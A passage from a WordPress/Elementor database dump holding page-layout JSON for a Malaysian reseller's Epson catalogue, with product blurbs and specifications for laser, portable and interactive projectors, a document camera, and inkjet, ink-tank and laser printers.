10.5px;\\\"><\\/center>\\n<\\/span><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-L500W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/>\\n\\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\\n<ul>\\n \\t<li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li>\\n \\t<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li>\\n \\t<li>Laser light source of up to 20,000 hours<\\/li>\\n \\t<li>Virtually maintenance-free for optical engine life<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"16f2278\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson LightScene EV-105<\\/strong><br \\/><br \\/><\\/h4><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"3a36c38\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7dad77c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b7207fe\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"466ac31\",\"elType\":\"widget\",\"settings\":{\"title\":\"ULTRA PORTABLE\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-1785W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2438 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"238\\\" height=\\\"177\\\" \\/>\\n\\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\\n<ul>\\n \\t<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>Real-Time Auto Keystone Correction<\\/li>\\n \\t<li>Split Screen Projection<\\/li>\\n \\t<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4f4cdf2\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2439 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1dcee02\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-5\",\"right\":\"-5\",\"bottom\":\"-5\",\"left\":\"-5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/h4>\\nWith the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.\\n<ul>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>White and Colour Brightness at 3,300lm<\\/li>\\n \\t<li>Multi-PC projection<\\/li>\\n \\t<li>HDMI Connectivity x2<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(8075,3497,'_elementor_version','2.5.14'),(8660,3663,'_elementor_version','2.7.4'),(8661,3663,'_wp_page_template','template-fullwidth.php'),(8078,3498,'_wp_page_template','template-fullwidth.php'),(8079,3498,'_elementor_edit_mode','builder'),(8080,3498,'_elementor_template_type','post'),(8081,3498,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2424 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><br>\\n\\nThe Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for 